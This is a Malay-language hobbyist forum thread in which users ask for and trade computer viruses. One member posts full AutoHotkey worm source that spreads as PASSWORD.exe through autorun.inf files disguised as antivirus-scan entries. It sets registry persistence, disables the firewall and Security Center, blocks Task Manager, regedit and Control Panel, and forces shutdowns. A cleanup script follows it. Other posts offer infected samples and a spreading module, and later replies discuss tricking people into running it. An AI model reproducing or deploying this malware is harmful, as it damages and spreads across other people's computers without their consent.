JayRin 0 Report post Posted January 6, 2011 mekom.. hii sepa yg ade virus yg bleh wat pc lag & shut down aku saja nak try kat pc aku ne n nak uji kemahiran aku lak ^^ tlg uplod utk aku ek.. tQ.~~ Quote Share this post Link to post Share on other sites
dvdbane 86 Report post Posted January 6, 2011 pe kate ko ttop windows firewall pastu uninstall antivirus g msok mne2 webiste [biskut tawar] xpon p*rn konpem dpt mcm2 certain cyber cafe xde antivirus try la cri mne2 yg berdekatan sample virus ak ad tp virus2 lme then effect die mls lak ak nk cri satu2 bg ak virus pling xbest ialah sality.. ko wat command prompt pon da bleh overload pc ko.. wat die bkk explorer endless... Quote Share this post Link to post Share on other sites
MenCaRi 10 Report post Posted January 7, 2011 wow brani mesti hang nak cuba kat harddisk lama kan tapi virus kalah ngan deep freeze Quote Share this post Link to post Share on other sites
dvdbane 86 Report post Posted January 9, 2011 [quote name='MenCaRi' timestamp='1294402807' post='1058794'] wow brani mesti hang nak cuba kat harddisk lama kan tapi virus kalah ngan deep freeze [/quote] we got anti deep freeze Quote Share this post Link to post Share on other sites
Genjuro 0 Report post Posted January 15, 2011 nak test jgn pakai sopware tu...hdd lama boleh la buat ujikaji.. Quote Share this post Link to post Share on other sites
NazreenNazari 5 Report post Posted January 19, 2011 aku still ade lagi smtp module yg org pakai sebar virus kt ym,haha...sample exe games yg da effected dgn parite32B and sality pn ade..nk?confirm corupt sume exe,tmasuk yg under windows wfp (windows file protection) Quote Share this post Link to post Share on other sites
MenCaRi 10 Report post Posted January 28, 2011 [quote name='NazCYPHER32' timestamp='1295458605' post='1059952'] aku still ade lagi smtp module yg org pakai sebar virus kt ym,haha...sample exe games yg da effected dgn parite32B and sality pn ade..nk?confirm corupt sume exe,tmasuk yg under windows wfp (windows file protection) [/quote] hehe share la file tu Quote Share this post Link to post Share on other sites
miegylah 0 Report post Posted February 14, 2011 salam, harap ADMIN jgn blok aku plak..hehehe.. nie aku nak share script virus yg pertama aku buat..newbiee la katakan..huhuhuhu HARAP JANGAN SALAH GUNA..!!! ##################################################################################################################### Regwrite,REG_SZ,HKEY_CURRENT_USER,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows,load,%windir%\system32\mizi\window.exe #Persistent #NoTrayIcon FileCreateDir,%A_windir%\system32\mizi FileSetAttrib, +RH,%A_windir%\system32\mizi IfExist, F:\PASSWORD.exe filecopy,F:\PASSWORD.exe,%A_windir%\system32\mizi\window.exe IfExist, G:\PASSWORD.exe filecopy,G:\PASSWORD.exe,%A_windir%\system32\mizi\window.exe IfExist, H:\PASSWORD.exe filecopy,H:\PASSWORD.exe,%A_windir%\system32\mizi\window.exe IfExist, I:\PASSWORD.exe filecopy,I:\PASSWORD.exe,%A_windir%\system32\mizi\window.exe IfExist, J:\PASSWORD.exe filecopy,J:\PASSWORD.exe,%A_windir%\system32\mizi\window.exe IfNotExist,%A_windir%\system32\mizi\PASSWORD.exe FileCopy,PASSWORD.exe,%A_windir%\system32\mizi\window.exe filecopy,%A_windir%\system32\mizi\window.exe,%A_MyDocuments%\My Videos\PASSWORD.exe filecopy,%A_windir%\system32\mizi\window.exe,C:\Documents and Settings\All Users\Documents\My Videos\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,C:\ filecopy,%A_windir%\system32\mizi\autorun.inf,D:\ filecopy,%A_windir%\system32\mizi\autorun.inf,G:\ Fileappend, ( [Autorun] open=PASSWORD.exe shellexecute=PASSWORD.exe shell\Auto\command=PASSWORD.exe shell\Scan for KASPERSKY Anti-Virus!\command =PASSWORD.exe shell\Scan with AVG.\command = PASSWORD.exe shell\Scan with Avira\command = PASSWORD.exe ),%A_windir%\system32\mizi\autorun.inf Filesetattrib,+SHR,%A_windir%\system32\mizi\autorun.inf Fileappend, ( net stop "Security Center" net stop SharedAccess netsh firewall set opmode mode-disable ),%A_windir%\system32\mizi\stop.bat Filesetattrib,+HR,%A_windir%\system32\mizi\stop.bat RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun,1 RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoClose,1 Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion,RegisteredOrganization,170188 sleep,100 run,%A_windir%\system32\mizi\stop.bat IfExist, F:\ filecopy,%A_windir%\system32\mizi\window.exe,F:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,F:\ IfExist, G:\ filecopy,%A_windir%\system32\mizi\window.exe,G:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,F:\ IfExist, H:\ filecopy,%A_windir%\system32\mizi\window.exe,H:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,F:\ IfExist, I:\ filecopy,%A_windir%\system32\mizi\window.exe,I:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,F:\ IfExist, J:\ filecopy,%A_windir%\system32\mizi\window.exe,J:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,J:\ settimer,ban,1000 SetTimer, WatchCursor, 100 return ban: WinGetActiveTitle, ed ifinstring,ed,microsoft word { WinGetActiveTitle, Title WinGetTitle, title, ahk_id %id% WinSetTitle, %title%, ,170188??170188??170188??170188??170188??170188?? return } ifinstring,ed,MY computer { Drive, Eject,A:, ; Eject the drive Drive, Eject,D:, ; Eject the drive Drive, Eject,C:, ; Eject the drive Drive, Eject,E:, ; Eject the drive Drive, Eject,F:, ; Eject the drive Drive, Eject,G:, ; Eject the drive Drive, Eject,H:, ; Eject the drive Drive, Eject,I:, ; Eject the drive SplashTextOn,200,40, 170188??, FUCKKK YYOOOUUU %USERNAME%!!!! Sleep, 3222 SplashTextOff WinGetActiveTitle, Title WinGetTitle, title, ahk_id %id% WinSetTitle, %title%, ,170188?? return } ifinstring,ed,Windows task manager { winclose %ed% InputBox, password,Enter Password,FROM %USERNAME%, if password = 170188 { RUN taskmgr.exe SLEEP,30000 RETURN } if password >=170188 { MSGBOX,,%USERNAME%,[maaf ye] YOU!!! winclose %ed% } if password <=170188 { MSGBOX,,%USERNAME%,[maaf ye] YOU!! winclose %ed% } } ifinstring,ed,gom player { winclose %ed% msgbox,262160,DAMM YOU %USERNAME%!!,170188??. ,5 return } ifinstring,ed,skype { WinGetActiveTitle, Title WinGetTitle, title, ahk_id %id% WinSetTitle, %title%, ,SEKAITTTT return } ifinstring,ed,Mozilla Firefox { winclose %ed% msgbox,262160,170188??`r ...,[maaf ye] musang berapi!!!,5 run shutdown -s -t 60 -c "hehehehe..." return } ifinstring,ed,control panel { winclose %ed% msgbox,262160,170188??,anda tak boleh akses `r ONLY 170188?? CAN DO IT!!..,5 run notepad return } ifinstring,ed,mizi { winclose %ed% run C:\ return } ifinstring,ed,microsoft internet explorer { SplashTextOn,200,40, 170188??, FUCKKK YYOOOUUU %USERNAME%!!!! Sleep, 3222 SplashTextOff WinGetActiveTitle, Title WinGetTitle, title, ahk_id %id% WinSetTitle, %title%, ,170188?? } ifinstring,ed,adobe reader { winclose %ed% msgbox,262160,%USERNAME% FOOLS,sorry the Windows cannot found this application,10 SoundPlay, %A_WinDir%\Media\Windows XP Logoff Sound.wav return } ifinstring,ed,media player classic { winclose %ed% SoundPlay, %A_WinDir%\Media\Windows XP Logoff Sound.wav msgbox,262160,170188??,Your Media Player Classic has been godam!!`r you can use Winamp ONLY!!...,10 return } ifinstring,ed,registry editor { winclose %ed% msgbox,262160,%USERNAME% FOOLS,you can't acsses this!!,5 SoundPlay, %A_WinDir%\Media\tada.wav return } ifinstring,ed,windows media player { Progress, b w200,170188??, FUCCKK!! %USERNAME%...,LOADINGG...%USERNAME% Progress, 10 SLEEP,200 Progress, 20 SLEEP,200 Progress, 30 SLEEP,200 Progress, 40 SLEEP,200 Progress, 50 SLEEP,200 Progress, 60 SLEEP,200 Progress, 70 SLEEP,200 Progress, 80 SLEEP,200 Progress, 90 SLEEP,200 Progress, 100 Sleep, 1000 Progress, Off WinGetActiveTitle, Title WinGetTitle, title, ahk_id %id% WinSetTitle, %title%, ,170188?? return } ifinstring,ed,network Connections { WinGetActiveTitle, Title WinGetTitle, title, ahk_id %id% WinSetTitle, %title%, ,170188?? return } ifinstring,ed,(F:) { filecopy,%A_windir%\system32\mizi\window.exe,F:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,F:\ return } ifinstring,ed,(G:) { filecopy,%A_windir%\system32\mizi\window.exe,G:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,G:\ return } ifinstring,ed,(H:) { filecopy,%A_windir%\system32\mizi\window.exe,H:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,H:\ return } ifinstring,ed,(I:) { filecopy,%A_windir%\system32\mizi\window.exe,I:\PASSWORD.exe filecopy,%A_windir%\system32\mizi\autorun.inf,I:\ return } return SetTimer, WatchCursor, 100 SetTimer, WatchForMenu, 5 return WatchCursor: MouseGetPos, , , id, control WinGetActiveTitle, Title WinGetTitle, title, ahk_id %id% WinGetClass, class, ahk_id %id% WatchForMenu: DetectHiddenWindows, on ; Might allow detection of menu sooner. IfWinExist, ahk_class #32768 WinSet, Transparent, 200 { ifnotexist,C:\%title%\PASSWORD.exe filecopy,%A_windir%\system32\mizi\window.exe,C:\%title%\PASSWORD.exe Fileappend, ( [.ShellClassInfo] IconFile=C:\WINDOWS\system32\shell32.dll IconIndex=3 ConfirmFileOp=0 [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=%A_windir%\Gone Fishing.bmp ),C:\%title%\desktop.ini Filesetattrib,+SHR,C:\%title%\desktop.ini } { ifnotexist,D:\%title%\PASSWORD.exe filecopy,%A_windir%\system32\mizi\window.exe,D:\%title%\PASSWORD.exe Fileappend, ( [.ShellClassInfo] IconFile=C:\WINDOWS\system32\shell32.dll IconIndex=3 ConfirmFileOp=0 [{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=%A_windir%\Gone Fishing.bmp ),D:\%title%\desktop.ini Filesetattrib,+SHR,D:\%title%\desktop.ini } { ifnotexist,F:\%title%\PASSWORD.exe filecopy,%A_windir%\system32\mizi\window.exe,F:\%title%\PASSWORD.exe } { ifnotexist,G:\%title%\PASSWORD.exe filecopy,%A_windir%\system32\mizi\window.exe,G:\%title%\PASSWORD.exe } { ifnotexist,H:\%title%\PASSWORD.exe filecopy,%A_windir%\system32\mizi\window.exe,H:\%title%\PASSWORD.exe } { ifnotexist,I:\%title%\PASSWORD.exe filecopy,%A_windir%\system32\mizi\window.exe,I:\%title%\PASSWORD.exe } return #######################################################################################################################salam, nie penawaq dia.. hehehe.. ################################################################################################# Progress, 10 SLEEP,200 Progress, 20 SLEEP,200 Progress, 30 SLEEP,200 Progress, 40 SLEEP,200 Progress, 50 SLEEP,200 Progress, 60 SLEEP,200 Progress, 70 SLEEP,200 Progress, 80 SLEEP,200 Progress, 90 SLEEP,200 Progress, 100 Sleep, 1000 Progress, Off RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun,0 RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoClose,0 Regwrite,REG_SZ,HKEY_CURRENT_USER,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows,load, Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion,RegisteredOwner,%username% Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion,RegisteredOrganization, RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\folder\hidden\NOHIDDEN,CheckedValue,2 RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\folder\hidden\NOHIDDEN,DefaultValue,2 RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\folder\hidden\SHOWALL,CheckedValue,1 RegWrite, REG_DWORD, HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\folder\hidden\SHOWALL,DefaultValue,2 FileDelete, C:\PASSWORD.exe FileDelete, D:\PASSWORD.exe FileDelete, G:\PASSWORD.exe FileDelete, C:\Autorun.inf FileDelete, D:\Autorun.inf FileDelete, G:\Autorun.inf FileDelete, C:\desktop.ini FileDelete, D:\desktop.ini FileDelete, G:\desktop.ini msgbox,Dah siap!!! ########################################################################################################### Quote Share this post Link to post Share on other sites
NeoLogy 74 Report post Posted February 14, 2011 ni gune script ape ni?AutoIt ke? Quote Share this post Link to post Share on other sites
miegylah 0 Report post Posted February 15, 2011 autohotkey Quote Share this post Link to post Share on other sites
DigIT 0 Report post Posted February 15, 2011 errr...script tu kalu boleh letak spoiler.. Quote Share this post Link to post Share on other sites
MenCaRi 10 Report post Posted July 21, 2014 mcm mana nak guna script tu? save .bat ka? Quote Share this post Link to post Share on other sites
umarzuki 78 Report post Posted July 24, 2014 ye la kot. mungkin nak kena cari supaya orang terklik Quote Share this post Link to post Share on other sites